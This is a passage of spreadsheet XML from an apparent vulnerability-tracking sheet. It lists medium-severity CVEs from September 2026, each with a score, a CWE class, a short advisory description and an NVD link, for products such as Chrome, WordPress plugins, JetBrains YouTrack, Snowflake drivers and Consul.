          <t>Use of released resource in Mobile in Google Chrome on on Android prior to 152.0.7977.82 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85044</t>
        </is>
      </c>
    </row>
    <row r="4075">
      <c r="A4075" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85116</t>
        </is>
      </c>
      <c r="C4075" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4075" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4075" s="5" t="inlineStr"/>
      <c r="F4075" s="5" t="inlineStr"/>
      <c r="G4075" s="5" t="inlineStr"/>
      <c r="H4075" s="5" t="inlineStr"/>
      <c r="I4075" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4075" s="5" t="inlineStr"/>
      <c r="K4075" s="5" t="inlineStr"/>
      <c r="L4075" s="5" t="inlineStr">
        <is>
          <t>The Simple CAPTCHA with Cloudflare Turnstile WordPress plugin from 1.2.2 before 1.42.3 runs the shortcode parser over the whole rendered Contact Form 7 form, including the values a visitor submitted, allowing unauthenticated users to execute arbitrary shortcodes registered on the site.</t>
        </is>
      </c>
      <c r="M4075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85116</t>
        </is>
      </c>
    </row>
    <row r="4076">
      <c r="A4076" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85117</t>
        </is>
      </c>
      <c r="C4076" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4076" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4076" s="5" t="inlineStr"/>
      <c r="F4076" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4076" s="5" t="inlineStr"/>
      <c r="H4076" s="5" t="inlineStr"/>
      <c r="I4076" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4076" s="5" t="inlineStr"/>
      <c r="K4076" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L4076" s="5" t="inlineStr">
        <is>
          <t>The Contact Form 7 Captcha WordPress plugin before 0.1.9 runs the shortcode parser over the whole rendered Contact Form 7 form, including the values a visitor submitted, allowing unauthenticated users to execute arbitrary shortcodes registered on the site.</t>
        </is>
      </c>
      <c r="M4076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85117</t>
        </is>
      </c>
    </row>
    <row r="4077">
      <c r="A4077" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85310</t>
        </is>
      </c>
      <c r="C4077" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4077" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4077" s="5" t="inlineStr"/>
      <c r="F4077" s="5" t="inlineStr"/>
      <c r="G4077" s="5" t="inlineStr"/>
      <c r="H4077" s="5" t="inlineStr"/>
      <c r="I4077" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4077" s="5" t="inlineStr"/>
      <c r="K4077" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="L4077" s="5" t="inlineStr">
        <is>
          <t>import_contacts Path Traversal in Groundhogg &lt;= 4.7.1 versions.</t>
        </is>
      </c>
      <c r="M4077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85310</t>
        </is>
      </c>
    </row>
    <row r="4078">
      <c r="A4078" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85769</t>
        </is>
      </c>
      <c r="C4078" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4078" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4078" s="5" t="inlineStr"/>
      <c r="F4078" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4078" s="5" t="inlineStr"/>
      <c r="H4078" s="5" t="inlineStr"/>
      <c r="I4078" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4078" s="5" t="inlineStr"/>
      <c r="K4078" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4078" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libtpms, a library that provides software TPM 2.0 emulation. When restoring TPM 2.0 state (for example during a virtual machine's power-on or state/migration restore), a malformed state blob can supply an oversized skip-block length that is not validated against the remaining size of the input buffer. This can drive an internal size counter negative, which bypasses a subsequent bounds check due to an unsafe signed-to-unsigned conversion, causing the parser to read memory outside the bounds of the heap buffer holding the state data. Successful exploitation can crash the process hosting libtpms (such as swtpm), resulting in a denial of service of the emulated TPM device and the virtual machine that depends on it. No data corruption or information disclosure was confirmed.</t>
        </is>
      </c>
      <c r="M4078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85769</t>
        </is>
      </c>
    </row>
    <row r="4079">
      <c r="A4079" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86332</t>
        </is>
      </c>
      <c r="C4079" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4079" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4079" s="5" t="inlineStr"/>
      <c r="F4079" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4079" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H4079" s="5" t="inlineStr"/>
      <c r="I4079" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4079" s="5" t="inlineStr"/>
      <c r="K4079" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4079" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in odh-dashboard in Red Hat OpenShift AI. The backend-for-frontend route GET /api/nim-serving/:nimResource reads Kubernetes Secrets using the dashboard service account and returns the full Secret object, including .data, without an authorization check. Any authenticated dashboard user can retrieve the cluster NVIDIA NGC API key Secret (apiKeySecret) and the NIM image pull secret (nimPullSecret). Create and delete of the same NIM credential are admin-gated; the read path is not. This is missing authorization (CWE-862) and insufficiently protected credentials (CWE-522). It is distinct from CVE-2026-5483 (service-account token leak in the Kubernetes client response wrapper on the same route) and CVE-2026-16456 (odh-model-controller cross-namespace confused deputy).</t>
        </is>
      </c>
      <c r="M4079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86332</t>
        </is>
      </c>
    </row>
    <row r="4080">
      <c r="A4080" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86488</t>
        </is>
      </c>
      <c r="C4080" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4080" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4080" s="5" t="inlineStr"/>
      <c r="F4080" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4080" s="5" t="inlineStr"/>
      <c r="H4080" s="5" t="inlineStr"/>
      <c r="I4080" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4080" s="5" t="inlineStr"/>
      <c r="K4080" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4080" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 iDOR via the watchRules and issueListConfig endpoints exposed private saved searches</t>
        </is>
      </c>
      <c r="M4080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86488</t>
        </is>
      </c>
    </row>
    <row r="4081">
      <c r="A4081" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86489</t>
        </is>
      </c>
      <c r="C4081" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4081" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4081" s="5" t="inlineStr"/>
      <c r="F4081" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4081" s="5" t="inlineStr"/>
      <c r="H4081" s="5" t="inlineStr"/>
      <c r="I4081" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4081" s="5" t="inlineStr"/>
      <c r="K4081" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4081" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 an IDOR in the user profile API disclosed private issues and starred folders across organizations</t>
        </is>
      </c>
      <c r="M4081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86489</t>
        </is>
      </c>
    </row>
    <row r="4082">
      <c r="A4082" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86490</t>
        </is>
      </c>
      <c r="C4082" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4082" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4082" s="5" t="inlineStr"/>
      <c r="F4082" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4082" s="5" t="inlineStr"/>
      <c r="H4082" s="5" t="inlineStr"/>
      <c r="I4082" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4082" s="5" t="inlineStr"/>
      <c r="K4082" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4082" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 improper permission checks allowed overwriting of bundled apps via the app import endpoint</t>
        </is>
      </c>
      <c r="M4082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86490</t>
        </is>
      </c>
    </row>
    <row r="4083">
      <c r="A4083" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86493</t>
        </is>
      </c>
      <c r="C4083" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4083" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4083" s="5" t="inlineStr"/>
      <c r="F4083" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4083" s="5" t="inlineStr"/>
      <c r="H4083" s="5" t="inlineStr"/>
      <c r="I4083" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4083" s="5" t="inlineStr"/>
      <c r="K4083" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4083" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 improper permission checks allowed read-only users to create and modify whiteboard cards</t>
        </is>
      </c>
      <c r="M4083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86493</t>
        </is>
      </c>
    </row>
    <row r="4084">
      <c r="A4084" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4084" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86495</t>
        </is>
      </c>
      <c r="C4084" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4084" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4084" s="5" t="inlineStr"/>
      <c r="F4084" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4084" s="5" t="inlineStr"/>
      <c r="H4084" s="5" t="inlineStr"/>
      <c r="I4084" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4084" s="5" t="inlineStr"/>
      <c r="K4084" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4084" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18687 missing permission checks allowed creating knowledge base articles in inaccessible projects</t>
        </is>
      </c>
      <c r="M4084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86495</t>
        </is>
      </c>
    </row>
    <row r="4085">
      <c r="A4085" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86550</t>
        </is>
      </c>
      <c r="C4085" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4085" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4085" s="5" t="inlineStr"/>
      <c r="F4085" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4085" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4085" s="5" t="inlineStr"/>
      <c r="I4085" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4085" s="5" t="inlineStr"/>
      <c r="K4085" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4085" s="5" t="inlineStr">
        <is>
          <t>NuBrowser lacks protocol whitelist validation for the S.browser_fallback_url field of intent://, allowing attackers to inject javascript: URLs via 302 redirects. This results in a universal cross‑site scripting (UXSS) vulnerability that enables script execution within the origin of arbitrary websites.</t>
        </is>
      </c>
      <c r="M4085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86550</t>
        </is>
      </c>
    </row>
    <row r="4086">
      <c r="A4086" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4086" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86597</t>
        </is>
      </c>
      <c r="C4086" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4086" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4086" s="5" t="inlineStr"/>
      <c r="F4086" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4086" s="5" t="inlineStr">
        <is>
          <t>node.js, python</t>
        </is>
      </c>
      <c r="H4086" s="5" t="inlineStr"/>
      <c r="I4086" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4086" s="5" t="inlineStr"/>
      <c r="K4086" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L4086" s="5" t="inlineStr">
        <is>
          <t>Insertion of sensitive information into log files in the Snowflake Python, Go, JDBC, Node.js, PHP PDO, and ODBC drivers allowed authentication tokens, query-result encryption keys, pre-signed cloud-storage URLs, and SAML assertions to be written to diagnostic logs in circumstances where the available log redaction did not cover all affected log paths and data types. An attacker with read access to the log destination, whether the local filesystem, a log aggregation service, or a CI/CD artifact store, could obtain credentials and decryption keys that, if still valid at the time of access, could be used to authenticate to the corresponding Snowflake account or cloud-storage object. Successful exploitation requires read access to the log destination, and impact is bounded by credential lifetime and object scope. The fix is available in Snowflake Connector for Python v4.7.3, Snowflake Go Driver v2.2.0, Snowflake JDBC Driver v4.3.4 (including the snowflake-jdbc-fips and snowflake-jdbc-thin), Snowflake Node.js Driver v3.3.0, Snowflake PHP PDO Driver v4.2.0, and Snowflake ODBC Driver v3.20.0. Users must manually upgrade and should securely delete previously generated diagnostic logs containing sensitive information where retention is not required.</t>
        </is>
      </c>
      <c r="M4086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86597</t>
        </is>
      </c>
    </row>
    <row r="4087">
      <c r="A4087" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4087" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86812</t>
        </is>
      </c>
      <c r="C4087" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4087" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4087" s="5" t="inlineStr"/>
      <c r="F4087" s="5" t="inlineStr"/>
      <c r="G4087" s="5" t="inlineStr"/>
      <c r="H4087" s="5" t="inlineStr"/>
      <c r="I4087" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4087" s="5" t="inlineStr"/>
      <c r="K4087" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L4087" s="5" t="inlineStr">
        <is>
          <t>The WPCafe  WordPress plugin before 3.0.18 does not correctly restrict access to a set of order-management REST endpoints because their permission callbacks return an incorrect type on failure, allowing unauthenticated users to disclose guest order information and to change the status of, or trash, any order.</t>
        </is>
      </c>
      <c r="M4087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86812</t>
        </is>
      </c>
    </row>
    <row r="4088">
      <c r="A4088" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87014</t>
        </is>
      </c>
      <c r="C4088" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4088" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4088" s="5" t="inlineStr"/>
      <c r="F4088" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4088" s="5" t="inlineStr"/>
      <c r="H4088" s="5" t="inlineStr"/>
      <c r="I4088" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4088" s="5" t="inlineStr"/>
      <c r="K4088" s="5" t="inlineStr">
        <is>
          <t>CWE-613, CWE-863</t>
        </is>
      </c>
      <c r="L4088" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.0 until 0.11.1, role synchronization in backend/open_webui/routers/auths.py and backend/open_webui/utils/oauth.py updated an administrator's database role without invalidating the user record cached by backend/open_webui/socket/main.py. An administrator demoted through a trusted role header or OAuth role mapping could keep an already-open Socket.IO connection and continue reading or editing every user's collaborative notes until that connection closed. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M4088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87014</t>
        </is>
      </c>
    </row>
    <row r="4089">
      <c r="A4089" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87073</t>
        </is>
      </c>
      <c r="C4089" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4089" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4089" s="5" t="inlineStr"/>
      <c r="F4089" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4089" s="5" t="inlineStr"/>
      <c r="H4089" s="5" t="inlineStr"/>
      <c r="I4089" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4089" s="5" t="inlineStr"/>
      <c r="K4089" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4089" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M4089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87073</t>
        </is>
      </c>
    </row>
    <row r="4090">
      <c r="A4090" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87106</t>
        </is>
      </c>
      <c r="C4090" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4090" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4090" s="5" t="inlineStr"/>
      <c r="F4090" s="5" t="inlineStr"/>
      <c r="G4090" s="5" t="inlineStr"/>
      <c r="H4090" s="5" t="inlineStr"/>
      <c r="I4090" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4090" s="5" t="inlineStr"/>
      <c r="K4090" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L4090" s="5" t="inlineStr">
        <is>
          <t>Consul and Consul Enterprise are vulnerable to a denial of service in the native RPC listener that may allow an authenticated client to exhaust server memory before ACL authorization is evaluated. A client that can complete the internal RPC mTLS handshake may exploit this issue without holding a valid ACL token. This vulnerability (CVE-2026-87106) is fixed in Consul 2.0.4 and Consul Enterprise 1.21.18, 1.22.12 and 2.0.4.</t>
        </is>
      </c>
      <c r="M4090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87106</t>
        </is>
      </c>
    </row>
    <row r="4091">
      <c r="A4091" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87429</t>
        </is>
      </c>
      <c r="C4091" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4091" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4091" s="5" t="inlineStr"/>
      <c r="F4091" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4091" s="5" t="inlineStr"/>
      <c r="H4091" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4091" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4091" s="5" t="inlineStr"/>
      <c r="K4091" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4091" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87429</t>
        </is>
      </c>
    </row>
    <row r="4092">
      <c r="A4092" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87436</t>
        </is>
      </c>
      <c r="C4092" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4092" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4092" s="5" t="inlineStr"/>
      <c r="F4092" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4092" s="5" t="inlineStr"/>
      <c r="H4092" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4092" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4092" s="5" t="inlineStr"/>
      <c r="K4092" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="L4092" s="5" t="inlineStr">
        <is>
          <t>Incomplete cleanup in Browser in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87436</t>
        </is>
      </c>
    </row>
    <row r="4093">
      <c r="A4093" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87437</t>
        </is>
      </c>
      <c r="C4093" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4093" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4093" s="5" t="inlineStr"/>
      <c r="F4093" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4093" s="5" t="inlineStr"/>
      <c r="H4093" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4093" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4093" s="5" t="inlineStr"/>
      <c r="K4093" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4093" s="5" t="inlineStr">
        <is>
          <t>Information leak in Frames in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87437</t>
        </is>
      </c>
    </row>
    <row r="4094">
      <c r="A4094" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87441</t>
        </is>
      </c>
      <c r="C4094" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4094" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4094" s="5" t="inlineStr"/>
      <c r="F4094" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4094" s="5" t="inlineStr"/>
      <c r="H4094" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4094" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4094" s="5" t="inlineStr"/>
      <c r="K4094" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4094" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87441</t>
        </is>
      </c>
    </row>
    <row r="4095">
      <c r="A4095" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87443</t>
        </is>
      </c>
      <c r="C4095" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4095" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4095" s="5" t="inlineStr"/>
      <c r="F4095" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4095" s="5" t="inlineStr"/>
      <c r="H4095" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4095" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4095" s="5" t="inlineStr"/>
      <c r="K4095" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4095" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Actor in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87443</t>
        </is>
      </c>
    </row>
    <row r="4096">
      <c r="A4096" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87446</t>
        </is>
      </c>
      <c r="C4096" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4096" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4096" s="5" t="inlineStr"/>
      <c r="F4096" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4096" s="5" t="inlineStr"/>
      <c r="H4096" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4096" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4096" s="5" t="inlineStr"/>
      <c r="K4096" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="L4096" s="5" t="inlineStr">
        <is>
